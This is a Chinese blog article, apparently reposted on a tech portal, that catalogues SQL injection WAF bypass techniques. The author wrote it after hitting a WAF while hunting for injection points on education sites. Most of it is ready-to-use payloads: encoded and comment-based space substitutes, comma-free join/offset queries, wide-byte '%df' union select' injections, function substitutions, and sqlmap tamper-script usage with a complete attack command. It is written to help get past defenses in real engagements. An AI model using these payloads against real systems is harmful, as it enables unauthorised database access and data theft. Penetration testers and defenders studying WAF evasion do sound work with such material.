您当前的位置:首页 > 电脑百科 > 安全防护 > 数据安全

sql注入绕过与sqlmap绕过使用总结

时间:2021-08-13 09:20:46  来源:  作者:IT影子

前言

最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。

sql注入绕过与sqlmap绕过使用总结

 


可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位师傅在实战中遇到waf可以看一看,能给各位师傅一点帮助,所以就想着写一篇。

还有一个很有可能是有注入点的但是,用了很多注入语句都不行,不知道怎么回事

sql注入绕过与sqlmap绕过使用总结

 


后面再去慢慢研究。

正文

手动绕过

一:空格被过滤
当空被过滤掉的时候(也就是被删掉的意思)问你就可以使用编码或者注释进行绕过

%20,%09,/**/  /*注释*/%0a,%0b,%0c,%0d,%a0

二:空格被过滤,括号未被过滤

像这样的

select(admin())from data where(1=1)and(2=2)id=1%27and(sleep(ascii(mid(data()from(1)for(1)))=1))%23

ascii:用字符的ASCII码来寻找

这里用多个括号代表空格

三:逗号绕过—-当我们需要用到offset、join、limit这些语句的时候。

使用join:

union select 1,2/代替成joinunion select * from (select 1)a join (select 2)b

使用offset:

limit 2,1代替成limit 1 offset 2

使用like:

select ascii(mid(user(),1,1))=97/使用like来寻找含有“a”的表(代替了上面的查询绕过了逗号)select user() like 'a%'

四:or and not xor绕过

如果在测试过程中出现这三个被过滤我们可以用他们等价的语句进行注入

'and'等价于'&&'   'or'等价于'||'    'xor'等价于'|'   'not'等价于'!'

五:等号绕过

?id=1 or 1 like 1 /用like代替了等号?id=1 or 1 rlike 1 /用rlike代替了等号?id=1 or 1 regexp 1 /用regexp代替了等号?id=1 or !(1 <> 1)或者1 !(<>) 1 /<> 等价于 != 所以在前面再加一个!结果就是等号了(双重否定变肯定)

六:编码绕过—-前提条件是没有对编码进行过滤

/16进制绕过select * from users where username = user;select * from users where username = 0x75736572;/两次url全编码1+and+1=21+%25%36%31%25%36%65%25%36%34+1=2

七:函数代替绕过—当输入函数被禁止时

/当一方函数被禁用时候就可以用另一边的函数进行注入hex()、bin()等价于ascii()sleep() 等价于benchmark()concat_ws()等价于group_concat()mid()、substr() 等价于substring()@@user等价于user()@@datadir 等价于atadir()

八:宽字节绕过—前提条件所输入的单双引号会被转义

%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=datab ase() -- qwe

这里我们在单引号前面了一个%df来绕过。

sqlmap绕过

sqlmap中的tamper里面很多防过滤的脚本,都是很实用的

sql注入绕过与sqlmap绕过使用总结

 


里面有很多类型的过滤,具体要使用那个脚本,我们要适当地手工测试
例如

sql注入绕过与sqlmap绕过使用总结

 


单引号没过滤,

再试一试其他的

sql注入绕过与sqlmap绕过使用总结

 


等于号没过滤

还有很多可以尝试,就不一个个说了

下面说一下脚本的利用说明

apostrophemask.py    用utf8代替引号        ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' b ase64encode.py     用b ase64编码替换          ("1' AND SLEEP(5)#")'MScgQU5EIFNMRUVQKDUpIw=='multiplespaces.py    围绕SQL关键字添加多个空格       ('1 UNION SELECT foobar')'1    UNION     SELECT   foobar'space2plus.py        用+替换空格              ('SELECT id FROM users')'SELECT+id+FROM+users'nonrecursivereplacement.py    双重查询语句。取代predefined SQL关键字with       ('1 UNION SELECT 2--')'1 UNIOUNIONNSELESELECTCT 2--'space2randomblank.py    代替空格字符(“”)从一个随机的空白字符可选字符的有效集    ('SELECT id FROM users')'SELECT%0Did%0DFROM%0Ausers'unionalltounion.py      替换UNION ALL SELECT UNION SELECT          ('-1 UNION ALL SELECT')'-1 UNION SELECT'securesphere.py        追加特制的字符串    ('1 AND 1=1')"1 AND 1=1 and '0having'='0having'"

还有很多师傅们可以到网上去查。

最后使用格式直接在语法里面加上—tamper “要使用的脚本”

例如:
sqlmap.py -u “http://www.xxxxx.com/test.php?id=1“ —delay=2 —random-agent —tamper “versionedmorekeywords.py”

要使用两个脚本的话就再加上去但是第一个后缀要去掉:—tamper “space2comment,versionedmorekeywords.py”

结语

在很多实战中都会有很多waf要绕过的,我们可以根据是什么waf来选择特定的来绕过,这样就不会浪费时间,一般判断是什么waf就指纹识别或者给个注入语句看看是什么拦截了。



Tags:sql注入   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
2021-11-26  Tags: sql注入  点击:(21)  评论:(0)  加入收藏
本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
2021-10-19  Tags: sql注入  点击:(51)  评论:(0)  加入收藏
(一)SQL注入。1.如何理解SQL注入? SQL注入是一种将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手法。2.SQL注入是如何产生的? web开发人员无法保证所有的输入...【详细内容】
2021-09-17  Tags: sql注入  点击:(46)  评论:(0)  加入收藏
一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
2021-09-17  Tags: sql注入  点击:(65)  评论:(0)  加入收藏
前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
2021-08-26  Tags: sql注入  点击:(59)  评论:(0)  加入收藏
前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
2021-08-13  Tags: sql注入  点击:(63)  评论:(0)  加入收藏
1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
2021-08-04  Tags: sql注入  点击:(74)  评论:(0)  加入收藏
0&times;00:前言对于MYSQL知识的一个初总结 0&times;01:正文 MYSQL数据库特性1.Mysql数据库默认不区分大小写,利用此特性可以进行大小写过正则匹配,举个简单的例子,有的题目中只...【详细内容】
2021-07-29  Tags: sql注入  点击:(88)  评论:(0)  加入收藏
在本地搭建服务器,httpd-vhosts.conf 中设置本地绑定的域名: 其中,zzzphp为下载的zzzphp cms的内容。然后,本机上的zzzphp cms的目录结构为如下: 在按照要求安装好cms后,本地cms的...【详细内容】
2021-07-16  Tags: sql注入  点击:(80)  评论:(0)  加入收藏
得到一个像原来老师一样督促你、关心你的人很难。。。---- 网易云热评一、常用命令及函数1、order by排序,获取数据有几个字段,后面小于等于字段数,都会返回结果,大于字段数返回...【详细内容】
2021-05-13  Tags: sql注入  点击:(223)  评论:(0)  加入收藏
▌简易百科推荐
众所周知,Windows系统流氓软件众多,其中不乏出身大厂的产品。这些带有流氓性质的软件,很多都会偷偷扫描系统数据,读取用户文件,造成电脑卡顿拖慢不说,还严重侵害了个人隐私,造成巨...【详细内容】
2021-12-06  趣玩APPS    Tags:流氓软件   点击:(16)  评论:(0)  加入收藏
前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
2021-11-26  IT野涵    Tags:sql注入   点击:(21)  评论:(0)  加入收藏
互联网时代,不论是个人还是组织,都将数据视为一项重要的资产。为了便于存储、管理,企业常常会为各项数据建立一个数据库,如果没有做好安全风险防护,一旦数据库被攻占,企业将迎来很...【详细内容】
2021-10-28  快快网络   企鹅号  Tags:数据库   点击:(50)  评论:(0)  加入收藏
前言(可能思路狭隘,有缺有错,师傅们多带带)【查看资料】Author: 0ne本篇文章数据来源于18+省市级别HVV,90+单位失陷报告。(一部分是笔者的参与,一部分是薅的公司其他师傅的报告...【详细内容】
2021-10-28  IT野涵    Tags:缺口   点击:(46)  评论:(0)  加入收藏
本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
2021-10-19    博客园  Tags:SQL注入   点击:(51)  评论:(0)  加入收藏
一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
2021-09-17  woaker    Tags:SQL注入漏洞   点击:(65)  评论:(0)  加入收藏
前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
2021-08-26  合天网安实验室    Tags:sql注入   点击:(59)  评论:(0)  加入收藏
“放纵自己的欲望是最大的祸害,窥探别人的隐私是最大的罪恶,不知自己的过失是最大的病痛”。 上文咱们知道了目前互联网的数据安全存在隐患,数据安全的问题,每天都在发生,只不过...【详细内容】
2021-08-13  小陶子矿工    Tags:IPFS   点击:(79)  评论:(0)  加入收藏
前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
2021-08-13  IT影子    Tags:sql注入   点击:(63)  评论:(0)  加入收藏
1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
2021-08-04  李志宽    Tags:SQL注入   点击:(74)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条